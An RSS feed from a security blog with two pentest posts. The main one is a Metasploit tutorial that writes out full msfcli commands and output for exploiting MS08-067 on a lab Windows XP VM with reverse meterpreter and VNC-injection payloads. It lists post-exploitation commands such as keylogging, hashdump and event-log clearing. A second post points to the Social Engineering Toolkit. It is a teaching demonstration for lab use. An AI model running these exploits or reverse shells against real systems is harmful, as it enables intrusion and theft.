<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Online Security &#187; pentest</title>
	<atom:link href="http://hackertarget.com/tag/pentest/feed/" rel="self" type="application/rss+xml" />
	<link>http://hackertarget.com</link>
	<description>Vulnerability Scanning and Assessments</description>
	<lastBuildDate>Sun, 05 Feb 2012 12:11:42 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Metasploit 3.4.0 on Ubuntu 10.04 a quick introduction</title>
		<link>http://hackertarget.com/2010/06/metasploit-3-4-0-on-ubuntu-10-04-a-quick-introduction/</link>
		<comments>http://hackertarget.com/2010/06/metasploit-3-4-0-on-ubuntu-10-04-a-quick-introduction/#comments</comments>
		<pubDate>Wed, 02 Jun 2010 05:56:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tools]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[rapid7]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://hackertarget.com/?p=568</guid>
		<description><![CDATA[Perhaps you have heard of metasploit. It is a very powerful exploitation framework developed by HD Moore. Solid growth has seen an early version that was a few exploits in a perl based wrapper turn into a ruby coded framework that is competing with Core Impact and Canvas in the pen-testing community. The latest version [...]<div class="addthis_toolbox addthis_default_style " addthis:url='http://hackertarget.com/2010/06/metasploit-3-4-0-on-ubuntu-10-04-a-quick-introduction/' addthis:title='Metasploit 3.4.0 on Ubuntu 10.04 a quick introduction '  ><a class="addthis_button_facebook_like" fb:like:layout="button_count"></a><a class="addthis_button_tweet"></a><a class="addthis_button_google_plusone" g:plusone:size="medium"></a><a class="addthis_counter addthis_pill_style"></a></div>]]></description>
			<content:encoded><![CDATA[<p>Perhaps you have heard of <a href="http://www.metasploit.com">metasploit</a>. It is a very powerful exploitation framework developed by HD Moore.</p>
<p>Solid growth has seen an early version that was a few exploits in a perl based wrapper turn into a ruby coded framework that is competing with <a href="http://www.coresecurity.com/">Core Impact</a> and <a href="http://www.immunitysec.com/products-canvas.shtml">Canvas</a> in the pen-testing community.</p>
<p>The latest version has recently been released so I thought I would give you a quick and dirty introduction to running it on <a href="http://www.ubuntulinux.org">Ubuntu</a> Linux 10.04. Of course it will run just as easily on <a href="http://fedoraproject.org/">Fedora</a> Linux, Windows or whatever Operating System floats your boat.</p>
<p>Download the framework from <a href="http://www.metasploit.com/framework/download/">http://www.metasploit.com/framework/download/</a></p>
<p>I chose the binary version for 64 bit Linux.</p>
<p>Ruby is not installed by default in Ubuntu so start off with:</p>
<blockquote><p>
apt-get install ruby<br />
chmod +x framework-3.4.0-linux-x86_64.run<br />
 ./framework-3.4.0-linux-x86_64.run<br />
Verifying archive integrity&#8230; All good.<br />
Uncompressing Metasploit Framework v3.4.0-release Installer (64-bit)&#8230;&#8230;..</p>
<p>                     888                           888        d8b888<br />
                     888                           888        Y8P888<br />
                     888                           888           888<br />
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888<br />
888 &#8220;888 &#8220;88bd8P  Y8b888       &#8220;88b88K     888 &#8220;88b888d88&#8243;&#8221;88b888888<br />
888  888  88888888888888   .d888888&#8243;Y8888b.888  888888888  888888888<br />
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.<br />
888  888  888 &#8220;Y8888  &#8220;Y888&#8243;Y888888 88888P&#8217;88888P&#8221; 888 &#8220;Y88P&#8221; 888 &#8220;Y888<br />
                                           888<br />
                                           888<br />
                                           888</p>
<p>Metasploit Framework v3.4.0 Release<br />
    Report Bugs: msfdev@metasploit.com</p>
<p>Warning: A copy of Metasploit already exists at /opt/metasploit3<br />
         continuing this installation will DELETE the previous<br />
         install, including all user-modified files.</p>
<p>Please enter &#8216;yes&#8217; to continue or any other key to abort<br />
Continue (yes/no) > yes</p>
<p>This installer will place Metasploit into the /opt/metasploit3 directory.<br />
Continue (yes/no) > yes<br />
Removing files from the previous installation&#8230;</p>
<p>Extracting the Metasploit operating environment&#8230;</p>
<p>Extracting the Metasploit Framework&#8230;</p>
<p>Installing links into /usr/local/bin&#8230;</p>
<p>Installation complete.</p>
<p>Would you like to automatically update Metasploit?<br />
AutoUpdate? (yes/no) > yes</p>
<p>*** snip ***</p>
<p>Updated to revision 9390.</p>
<p>Launch the Metasploit console by running &#8216;msfconsole&#8217;</p>
<p>Exiting the installer&#8230;<br />
root@testbox:/home/testuser/Downloads# msfconsole</p>
<p>                                  _<br />
                                 | |      o<br />
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_<br />
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |<br />
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/<br />
                           /|<br />
                           \|</p>
<p>       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]<br />
+ &#8212; &#8211;=[ 553 exploits - 264 auxiliary<br />
+ -- --=[ 208 payloads - 23 encoders - 8 nops<br />
       =[ svn r9390 updated today (2010.06.01)</p>
<p>msf > exit
</p></blockquote>
<p>Ok, we now have a working Metasploit, hoorah for us.</p>
<p>Now we want to do a quick exploit of a Windows XP SP2 test machine I have on my network. It is running in Sun Virtual box using Host Only Networking as we will see shortly.</p>
<p>I like to use the command line utility for msf (msfcli) as once you get used to the syntax it is easier and faster. However if you prefer go with the msfconsole.</p>
<p>Running "#msfcli" will list all exploits, payloads and other modules.</p>
<blockquote><p>
#msfcli | grep 08_067<br />
exploit/windows/smb/ms08_067_netapi</p>
<p>Lets hit my windows box with exploit/windows/smb/ms08_067_netapi it is stable and works very well.</p>
<p>#msfcli  exploit/windows/smb/ms08_067_netapi<br />
[*] Please wait while we load the module tree&#8230;<br />
Usage: /opt/metasploit3/msf3/msfcli <exploit_name><br />
<option=value> [mode]<br />
========================================================================</p>
<p>    Mode           Description<br />
    &#8212;-           &#8212;&#8212;&#8212;&#8211;<br />
    (H)elp         You&#8217;re looking at it baby!<br />
    (S)ummary      Show information about this module<br />
    (O)ptions      Show available options for this module<br />
    (A)dvanced     Show available advanced options for this module<br />
    (I)DS Evasion  Show available ids evasion options for this module<br />
    (P)ayloads     Show available payloads for this module<br />
    (T)argets      Show available targets for this exploit module<br />
    (AC)tions      Show available actions for this auxiliary module<br />
    (C)heck        Run the check routine of the selected module<br />
    (E)xecute      Execute the selected module</p>
<p>#msfcli  exploit/windows/smb/ms08_067_netapi O<br />
[*] Please wait while we load the module tree&#8230;</p>
<p>   Name     Current Setting  Required  Description<br />
   &#8212;-     &#8212;&#8212;&#8212;&#8212;&#8212;  &#8212;&#8212;&#8211;  &#8212;&#8212;&#8212;&#8211;<br />
   RHOST                     yes       The target address<br />
   RPORT    445              yes       Set the SMB service port<br />
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</p>
</blockquote>
<p>Running the following will display all payloads that will work with ms08_067_netapi. I have selected two in the following examples. A reverse meterpreter and a vnc reverse dll injection.<br />
#msfcli exploit/windows/smb/ms08_067_netapi P</p>
<p>My windows box is 192.168.56.101 and my local Ubuntu system is 192.168.56.1.</p>
<blockquote><p>
# msfcli  exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E<br />
[*] Please wait while we load the module tree&#8230;<br />
[*] Started reverse handler on 192.168.56.1:4444<br />
[*] Automatically detecting the target&#8230;<br />
[*] Fingerprint: Windows XP Service Pack 2 &#8211; lang:English<br />
[*] Selected Target: Windows XP SP2 English (NX)<br />
[*] Attempting to trigger the vulnerability&#8230;<br />
[*] Sending stage (748032 bytes) to 192.168.56.101<br />
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1050)</p>
<p>meterpreter > run checkvm<br />
[*] Checking if target is a Virtual Machine &#8230;..<br />
[*] This is a Sun VirtualBox Virtual Machine<br />
meterpreter > run getcountermeasure<br />
[*] Running Getcountermeasure on the target&#8230;<br />
[*] Checking for contermeasures&#8230;<br />
[*] 	Possible countermeasure found avgemc.exe C:\Program Files\AVG\AVG9\avgemc.exe<br />
[*] Getting Windows Built in Firewall configuration&#8230;<br />
[*]<br />
[*] 	Domain profile configuration:<br />
[*] 	&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
[*] 	Operational mode                  = Enable<br />
[*] 	Exception mode                    = Enable<br />
[*]<br />
[*] 	Standard profile configuration (current):<br />
[*] 	&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
[*] 	Operational mode                  = Disable<br />
[*] 	Exception mode                    = Enable<br />
[*]<br />
[*] 	Local Area Connection firewall configuration:<br />
[*] 	&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
[*] 	Operational mode                  = Enable<br />
[*]<br />
[*] 	Local Area Connection 2 firewall configuration:<br />
[*] 	&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
[*] 	Operational mode                  = Enable<br />
[*]<br />
[*] Checking DEP Support Policy&#8230;<br />
meterpreter > run get_local_subnets<br />
Local subnet: 10.0.2.0/255.255.255.0<br />
Local subnet: 192.168.56.0/255.255.255.0<br />
meterpreter > help</p>
<p>Core Commands<br />
=============</p>
<p>    Command       Description<br />
    &#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
    ?             Help menu<br />
    background    Backgrounds the current session<br />
    bgkill        Kills a background meterpreter script<br />
    bglist        Lists running background scripts<br />
    bgrun         Executes a meterpreter script as a background thread<br />
    channel       Displays information about active channels<br />
    close         Closes a channel<br />
    exit          Terminate the meterpreter session<br />
    help          Help menu<br />
    interact      Interacts with a channel<br />
    irb           Drop into irb scripting mode<br />
    migrate       Migrate the server to another process<br />
    quit          Terminate the meterpreter session<br />
    read          Reads data from a channel<br />
    run           Executes a meterpreter script<br />
    use           Load a one or more meterpreter extensions<br />
    write         Writes data to a channel</p>
<p>Stdapi: File system Commands<br />
============================</p>
<p>    Command       Description<br />
    &#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
    cat           Read the contents of a file to the screen<br />
    cd            Change directory<br />
    del           Delete the specified file<br />
    download      Download a file or directory<br />
    edit          Edit a file<br />
    getlwd        Print local working directory<br />
    getwd         Print working directory<br />
    lcd           Change local working directory<br />
    lpwd          Print local working directory<br />
    ls            List files<br />
    mkdir         Make directory<br />
    pwd           Print working directory<br />
    rm            Delete the specified file<br />
    rmdir         Remove directory<br />
    upload        Upload a file or directory</p>
<p>Stdapi: Networking Commands<br />
===========================</p>
<p>    Command       Description<br />
    &#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
    ipconfig      Display interfaces<br />
    portfwd       Forward a local port to a remote service<br />
    route         View and modify the routing table</p>
<p>Stdapi: System Commands<br />
=======================</p>
<p>    Command       Description<br />
    &#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
    clearev       Clear the event log<br />
    drop_token    Relinquishes any active impersonation token.<br />
    execute       Execute a command<br />
    getpid        Get the current process identifier<br />
    getprivs      Get as many privileges as possible<br />
    getuid        Get the user that the server is running as<br />
    kill          Terminate a process<br />
    ps            List running processes<br />
    reboot        Reboots the remote computer<br />
    reg           Modify and interact with the remote registry<br />
    rev2self      Calls RevertToSelf() on the remote machine<br />
    shell         Drop into a system command shell<br />
    shutdown      Shuts down the remote computer<br />
    steal_token   Attempts to steal an impersonation token from the target process<br />
    sysinfo       Gets information about the remote system, such as OS</p>
<p>Stdapi: User interface Commands<br />
===============================</p>
<p>    Command        Description<br />
    &#8212;&#8212;-        &#8212;&#8212;&#8212;&#8211;<br />
    enumdesktops   List all accessible desktops and window stations<br />
    getdesktop     Get the current meterpreter desktop<br />
    idletime       Returns the number of seconds the remote user has been idle<br />
    keyscan_dump   Dump the keystroke buffer<br />
    keyscan_start  Start capturing keystrokes<br />
    keyscan_stop   Stop capturing keystrokes<br />
    screenshot     Grab a screenshot of the interactive desktop<br />
    setdesktop     Change the meterpreters current desktop<br />
    uictl          Control some of the user interface components</p>
<p>Priv: Elevate Commands<br />
======================</p>
<p>    Command       Description<br />
    &#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
    getsystem     Attempt to elevate your privilege to that of local system.</p>
<p>Priv: Password database Commands<br />
================================</p>
<p>    Command       Description<br />
    &#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
    hashdump      Dumps the contents of the SAM database</p>
<p>Priv: Timestomp Commands<br />
========================</p>
<p>    Command       Description<br />
    &#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
    timestomp     Manipulate file MACE attributes</p>
<p>meterpreter >  pwd<br />
C:\WINDOWS\system32<br />
meterpreter > cd ..<br />
meterpreter > cd ..<br />
meterpreter > pwd<br />
C:\<br />
meterpreter >  ls</p>
<p>Listing: C:\<br />
============</p>
<p>Mode              Size       Type  Last modified              Name<br />
&#8212;-              &#8212;-       &#8212;-  &#8212;&#8212;&#8212;&#8212;-              &#8212;-<br />
40777/rwxrwxrwx   0          dir   2009-12-22 05:59:31 +1100  $AVG<br />
100777/rwxrwxrwx  0          fil   2009-12-22 05:39:51 +1100  AUTOEXEC.BAT<br />
100666/rw-rw-rw-  0          fil   2009-12-22 05:39:51 +1100  CONFIG.SYS<br />
40777/rwxrwxrwx   0          dir   2010-02-12 15:23:25 +1100  Documents and Settings<br />
100444/r&#8211;r&#8211;r&#8211;  0          fil   2009-12-22 05:39:51 +1100  IO.SYS<br />
40777/rwxrwxrwx   0          dir   2010-02-11 13:11:43 +1100  Inetpub<br />
100444/r&#8211;r&#8211;r&#8211;  0          fil   2009-12-22 05:39:51 +1100  MSDOS.SYS<br />
100555/r-xr-xr-x  47564      fil   2004-08-04 22:00:00 +1000  NTDETECT.COM<br />
40555/r-xr-xr-x   0          dir   2010-04-08 15:57:51 +1000  Program Files<br />
40777/rwxrwxrwx   0          dir   2010-04-09 13:14:56 +1000  RECYCLER<br />
40777/rwxrwxrwx   0          dir   2009-12-22 05:43:08 +1100  System Volume Information<br />
40777/rwxrwxrwx   0          dir   2010-04-09 13:18:19 +1000  WINDOWS<br />
100666/rw-rw-rw-  211        fil   2009-12-22 05:35:20 +1100  boot.ini<br />
100444/r&#8211;r&#8211;r&#8211;  250032     fil   2004-08-04 22:00:00 +1000  ntldr<br />
100666/rw-rw-rw-  301989888  fil   2010-06-01 02:21:17 +1000  pagefile.sys</p>
</blockquote>
<p>The power of the meterpreter is really only limited by your imagination. Keylogging, screen captures, adding accounts, dumping the hashes to be cracked offline&#8230;..</p>
<p>Now for a vnc injection.</p>
<blockquote><p>
# msfcli  exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/vncinject/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E<br />
[*] Please wait while we load the module tree&#8230;<br />
[*] Started reverse handler on 192.168.56.1:4444<br />
[*] Automatically detecting the target&#8230;<br />
[*] Fingerprint: Windows XP Service Pack 2 &#8211; lang:English<br />
[*] Selected Target: Windows XP SP2 English (NX)<br />
[*] Attempting to trigger the vulnerability&#8230;<br />
[*] Sending stage (445440 bytes) to 192.168.56.101<br />
[*] Starting local TCP relay on 127.0.0.1:5900&#8230;<br />
[*] Local TCP relay started.<br />
[*] Launched vnciewer in the background.<br />
Connected to RFB server, using protocol version 3.8<br />
Enabling TightVNC protocol extensions<br />
No authentication needed<br />
Authentication successful<br />
Desktop name &#8220;snipped&#8221;<br />
VNC server default format:<br />
  32 bits per pixel.<br />
  Least significant byte first in each pixel.<br />
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0<br />
Using default colormap which is TrueColor.  Pixel format:<br />
  32 bits per pixel.<br />
  Least significant byte first in each pixel.<br />
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0<br />
Same machine: preferring raw encoding<br />
[*] VNC Server session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1062)</p>
</blockquote>
<p>This should pop up a vnc session with full desktop control of your Windows XP SP2 Host. This is a good dramatic way to show people the power of metasploit and to reinforce the need for patching to your users.</p>
<p>I did a recent demonstration to a group of corporate helpdesk operators and they were quite surprised at just how easy it can be.</p>
<div class="addthis_toolbox addthis_default_style " addthis:url='http://hackertarget.com/2010/06/metasploit-3-4-0-on-ubuntu-10-04-a-quick-introduction/' addthis:title='Metasploit 3.4.0 on Ubuntu 10.04 a quick introduction '  ><a class="addthis_button_facebook_like" fb:like:layout="button_count"></a><a class="addthis_button_tweet"></a><a class="addthis_button_google_plusone" g:plusone:size="medium"></a><a class="addthis_counter addthis_pill_style"></a></div>]]></content:encoded>
			<wfw:commentRss>http://hackertarget.com/2010/06/metasploit-3-4-0-on-ubuntu-10-04-a-quick-introduction/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>SET Social Engineering Toolkit</title>
		<link>http://hackertarget.com/2010/05/set-social-engineering-toolkit/</link>
		<comments>http://hackertarget.com/2010/05/set-social-engineering-toolkit/#comments</comments>
		<pubDate>Wed, 05 May 2010 09:35:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tools]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[social engineer]]></category>

		<guid isPermaLink="false">http://hackertarget.com/?p=565</guid>
		<description><![CDATA[This tool and guide to using the tool is an example of how easy client based exploitation has become. When it comes down to it, attacking the client is fast becoming the easiest method to perform a targeted attack against an organisation or company. For our readers who are not familiar with Metasploit this maybe [...]<div class="addthis_toolbox addthis_default_style " addthis:url='http://hackertarget.com/2010/05/set-social-engineering-toolkit/' addthis:title='SET Social Engineering Toolkit '  ><a class="addthis_button_facebook_like" fb:like:layout="button_count"></a><a class="addthis_button_tweet"></a><a class="addthis_button_google_plusone" g:plusone:size="medium"></a><a class="addthis_counter addthis_pill_style"></a></div>]]></description>
			<content:encoded><![CDATA[<p>This tool and guide to using the tool is an example of how easy client based exploitation has become. When it comes down to it, attacking the client is fast becoming the easiest method to perform a targeted attack against an organisation or company.</p>
<p>For our readers who are not familiar with <a href="http://www.metasploit.com/">Metasploit</a> this maybe a little advanced. However you should still be aware of how relatively easy this sort of attack can be. After all the weakest point in most organisations is the end user.</p>
<p>The guys at <a href="http://www.offensive-security.com/">offensive-security.com</a> have a put some <a href="http://www.offensive-security.com/metasploit-unleashed/">metasploit training online</a> and the guide to the <a href="http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit">Social Engineering Toolkit (SET)</a> is a good step by step tutorial to using the tool and exploiting clients.</p>
<p>Depending on the guidelines of your Pen-Test, attacking the client is often a valuable entry point into the entire network. Frankly once you get the client there is little stopping you from taking the whole network.</p>
<p><a href="http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit">SET Social Engineering Toolkit</a></p>
<div class="addthis_toolbox addthis_default_style " addthis:url='http://hackertarget.com/2010/05/set-social-engineering-toolkit/' addthis:title='SET Social Engineering Toolkit '  ><a class="addthis_button_facebook_like" fb:like:layout="button_count"></a><a class="addthis_button_tweet"></a><a class="addthis_button_google_plusone" g:plusone:size="medium"></a><a class="addthis_counter addthis_pill_style"></a></div>]]></content:encoded>
			<wfw:commentRss>http://hackertarget.com/2010/05/set-social-engineering-toolkit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

